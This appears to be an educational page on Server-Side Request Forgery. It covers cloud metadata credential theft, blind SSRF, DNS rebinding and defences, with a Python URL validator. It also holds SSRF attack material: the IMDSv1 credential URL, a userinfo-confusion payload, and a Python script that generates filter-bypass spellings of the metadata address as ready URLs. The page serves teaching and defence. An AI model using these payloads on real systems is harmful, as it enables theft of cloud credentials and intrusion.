SSRF is a vulnerability where attackers trick a server into making requests to unintended internal or external resources, potentially accessing cloud metadata, internal services, or sensitive data.
SSRF (Server-Side Request Forgery) is a vulnerability that lets an attacker make a server-side application issue requests to destinations the attacker chooses. Most SSRF is over HTTP, but the reach is whatever the fetching library supports, which can include file://, gopher:// or raw TCP. Attackers abuse features that fetch external resources by manipulating the URL so that it points at internal services, cloud metadata endpoints, or other infrastructure reachable only from the server.
In cloud environments, SSRF can reach the instance metadata service (169.254.169.254 on AWS, GCP and Azure). With AWS IMDSv1 a single unauthenticated GET to http://169.254.169.254/latest/meta-data/iam/security-credentials/<role-name> returns the instance role's temporary access key ID, secret access key and session token. Those credentials carry whatever permissions the instance role has, which is often far more than the application needs, so one SSRF can turn into lateral movement, data exfiltration, and full infrastructure compromise.
Common SSRF vectors include URL parameters for webhooks, file imports, PDF generators, image processors, URL previews, and API integrations. Attackers point these inputs at the private ranges (10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16), loopback (127.0.0.0/8) services bound only to localhost, the link-local metadata address 169.254.169.254, and internal microservices that trust any caller from inside the network.
Prevention requires validating the destination against an allowlist of schemes and hosts; blocking the private, loopback, link-local and metadata ranges by checking the resolved IP address rather than the hostname string; resolving the hostname once and connecting to that exact address so a later lookup cannot be rebound; re-validating every redirect hop, since a 302 from an allowed host to 169.254.169.254 bypasses a check done only on the initial URL; requiring IMDSv2 on cloud instances (on AWS: aws ec2 modify-instance-metadata-options --http-tokens required --http-put-response-hop-limit 1, so metadata can only be read with a session token obtained by a PUT, and the token response cannot be forwarded beyond the instance's own network stack, for example into a bridged container); segmenting the network; and running URL-fetching components in an isolated segment with restricted egress.
Blind SSRF occurs when the application makes the server-side request but never returns the response body to the attacker. The attacker cannot read internal data directly, but differences in response time, status code or error message still reveal whether a host and port are reachable (port scanning), the request can still trigger state-changing actions on internal services that accept GET, and an out-of-band channel such as a DNS or HTTP callback to an attacker-controlled domain confirms that the request was made at all.
SSRF became a standalone category, A10:2021, in the OWASP Top 10 2021 edition; OWASP added it on the strength of the Top 10 community survey, where it ranked first, with above-average exploit and impact ratings despite a relatively low incidence in the tested data. Earlier editions had no SSRF entry of its own; the move to microservices and cloud infrastructure, where one internal request can yield credentials, is what raised its profile.
DNS rebinding defeats protections that resolve the hostname to check it and then let the HTTP client resolve it again to connect. The attacker runs the authoritative DNS server for a domain they control and serves answers with a very short TTL: the first answer is a permitted public IP, so the check passes; the second answer, given to the HTTP client moments later, is an internal IP such as 169.254.169.254. The fix is to resolve once, validate the resolved address, and connect to that exact address, sending the original hostname in the Host header.
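The prevention steps above (scheme and host allowlist, blocking private and metadata ranges against the resolved address, resolving once) and the rebinding defence in the previous paragraph, as one added Python example. This is illustrative code written for this page, not from any named project or library. The hostnames, the public address 93.184.216.34 and the internal addresses used by the resolver test doubles are constructed; check_url, is_safe_url, static_resolver and rebinding_resolver are names chosen here.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example, not code from the original page. A pre-flight check for a
# server-side URL fetcher: pin the scheme, reject userinfo, canonicalise
# numeric hosts the way a C HTTP stack would, resolve the name exactly ONCE,
# reject non-public addresses, and return the resolved IP so the caller
# connects to that IP (sending the original name as Host) instead of letting
# the HTTP client resolve again. That second resolution is what rebinding needs.

ALLOWED_SCHEMES = {"http", "https"}
DEFAULT_PORTS = {"http": 80, "https": 443}
# Link-local already fails the public-address test; listing the metadata
# endpoints explicitly documents the intent for reviewers.
DENIED_NETWORKS = [ipaddress.ip_network("169.254.169.254/32"),
                   ipaddress.ip_network("fd00:ec2::254/128")]


class UnsafeURL(ValueError):
    """Raised when a URL must not be fetched server-side."""


def _resolve(host):
    """Real resolver: A/AAAA lookup via getaddrinfo, IPv6 scope IDs stripped."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return [ipaddress.ip_address(info[4][0].split("%")[0]) for info in infos]


def _literal_ip(host):
    """Return the address if `host` is any numeric spelling, else None.

    inet_aton is tried first because it is the parser most C HTTP stacks use
    and it accepts legacy forms a string filter misses: decimal ("2130706433"),
    hex ("0x7f000001"), octal ("0177.0.0.1") and short ("127.1").
    """
    if ":" not in host:
        try:
            return ipaddress.ip_address(socket.inet_ntoa(socket.inet_aton(host)))
        except OSError:
            pass
    try:
        return ipaddress.ip_address(host)      # IPv6 literals such as ::1
    except ValueError:
        return None


def _is_public(addr):
    """True only for globally routable unicast addresses."""
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        addr = addr.ipv4_mapped                # [::ffff:10.0.0.5] is 10.0.0.5
    if any(addr in net for net in DENIED_NETWORKS):
        return False
    return (addr.is_global and not addr.is_multicast and not addr.is_reserved
            and not addr.is_loopback and not addr.is_link_local
            and not addr.is_unspecified)


def check_url(url, resolver=_resolve, allowed_hosts=None):
    """Validate `url`; return (scheme, host, port, pinned_ip, path_and_query).

    `allowed_hosts` is an optional hostname allowlist; `resolver` is
    injectable so the DNS behaviour can be exercised offline.
    """
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeURL(f"scheme not allowed: {scheme!r}")
    if parts.username is not None or parts.password is not None:
        raise UnsafeURL("userinfo not allowed")   # http://ok.example@10.0.0.5/
    host = parts.hostname
    if not host:
        raise UnsafeURL("missing host")
    if allowed_hosts is not None and host not in allowed_hosts:
        raise UnsafeURL(f"host not in allowlist: {host!r}")
    try:
        port = parts.port if parts.port is not None else DEFAULT_PORTS[scheme]
    except ValueError as exc:
        raise UnsafeURL(f"bad port: {exc}")
    literal = _literal_ip(host)
    addrs = [literal] if literal is not None else resolver(host)
    if not addrs:
        raise UnsafeURL(f"no address for {host!r}")
    for addr in addrs:
        if not _is_public(addr):
            raise UnsafeURL(f"{host!r} resolves to non-public {addr}")
    path = parts.path or "/"
    if parts.query:
        path += "?" + parts.query
    # The caller opens the socket to pinned_ip and sends `host` as the Host
    # header (and SNI for https); no second DNS lookup ever happens.
    return scheme, host, port, str(addrs[0]), path


def is_safe_url(url, **kwargs):
    """Boolean wrapper around check_url()."""
    try:
        check_url(url, **kwargs)
        return True
    except UnsafeURL:
        return False


def static_resolver(*ips):
    """Test double (constructed data): always answer with these addresses."""
    answers = [ipaddress.ip_address(ip) for ip in ips]
    return lambda host: list(answers)


def rebinding_resolver(*ips):
    """Test double modelling an attacker's DNS: a new answer on every lookup."""
    answers = iter([ipaddress.ip_address(ip) for ip in ips])
    return lambda host: [next(answers)]
```

To use the result with a real client, connect a socket to pinned_ip:port and send host in the Host header; for https, wrap that socket with ssl.create_default_context().wrap_socket(sock, server_hostname=host) so SNI and certificate verification still use the hostname, not the IP. Every redirect the server returns must be passed through check_url again before it is followed.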
Testing for SSRF involves injecting internal IP addresses, cloud metadata URLs, and out-of-band callback URLs (such as a Burp Collaborator host) into URL parameters. Testers try localhost, 169.254.169.254 and known internal service endpoints, and bypass string filters with alternative encodings: decimal (2852039166 for 169.254.169.254), octal and hex forms of the address, IPv4-mapped IPv6 ([::ffff:169.254.169.254]), and URL parser inconsistencies such as userinfo confusion (http://allowed.example@169.254.169.254/) or an open redirect on an allowed host.
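The encoding tricks above, as an added Python example written for this page (not tooling from any named project): it enumerates the alternative spellings of an IPv4 target that a tester substitutes into a URL parameter, and confirms offline, using the platform's inet_aton, that each spelling still denotes the target, so only payloads the server's own IP parser will accept get sent. The function names are chosen here; 169.254.169.254 is the cloud metadata address and the other addresses are constructed.

```python
import socket
from ipaddress import IPv4Address, IPv6Address

# Added example, not from the original page. Generates filter-bypass spellings
# of an IPv4 address and verifies each against inet_aton (the parser used by
# most C-based HTTP stacks) so a tester knows the payload is well-formed before
# injecting it. Octal and hex forms depend on the platform's inet_aton; glibc,
# musl, BSD and Windows all accept them.


def ssrf_host_variants(target):
    """Alternative host spellings of a dotted-quad IPv4 `target`."""
    octets = [int(o) for o in target.split(".")]
    n = int(IPv4Address(target))
    return {
        "dotted": target,
        "decimal": str(n),                                   # 2852039166
        "hex": f"0x{n:08x}",                                 # 0xa9fea9fe
        "octal": ".".join(f"0{o:o}" for o in octets),        # 0251.0376.0251.0376
        "dotted_hex": ".".join(f"0x{o:02x}" for o in octets),
        # a.b form: inet_aton treats the last part as the remaining 24 bits
        "short": f"{octets[0]}.{(octets[1] << 16) | (octets[2] << 8) | octets[3]}",
        "ipv6_mapped": f"[::ffff:{target}]",
        "ipv6_mapped_hex": f"[::ffff:{n >> 16:x}:{n & 0xffff:x}]",
    }


def parses_as(host, target):
    """True if `host` (as it would appear in a URL) denotes `target`."""
    bare = host.strip("[]")
    if ":" in bare:                        # IPv6 literal: check the mapped v4
        mapped = IPv6Address(bare).ipv4_mapped
        return mapped is not None and str(mapped) == target
    try:
        return socket.inet_ntoa(socket.inet_aton(bare)) == target
    except OSError:                        # not an address at all, e.g. a name
        return False


def working_payloads(target):
    """Variants confirmed to parse back to `target` on this platform."""
    return {name: host for name, host in ssrf_host_variants(target).items()
            if parses_as(host, target)}


if __name__ == "__main__":
    for name, host in working_payloads("169.254.169.254").items():
        print(f"{name:16} http://{host}/latest/meta-data/")
```

A string filter that only looks for "169.254.169.254" or "127.0.0.1" misses every variant except the dotted one; a filter that first canonicalises the host through the same parser the fetcher uses (or through ipaddress after inet_aton) catches all of them.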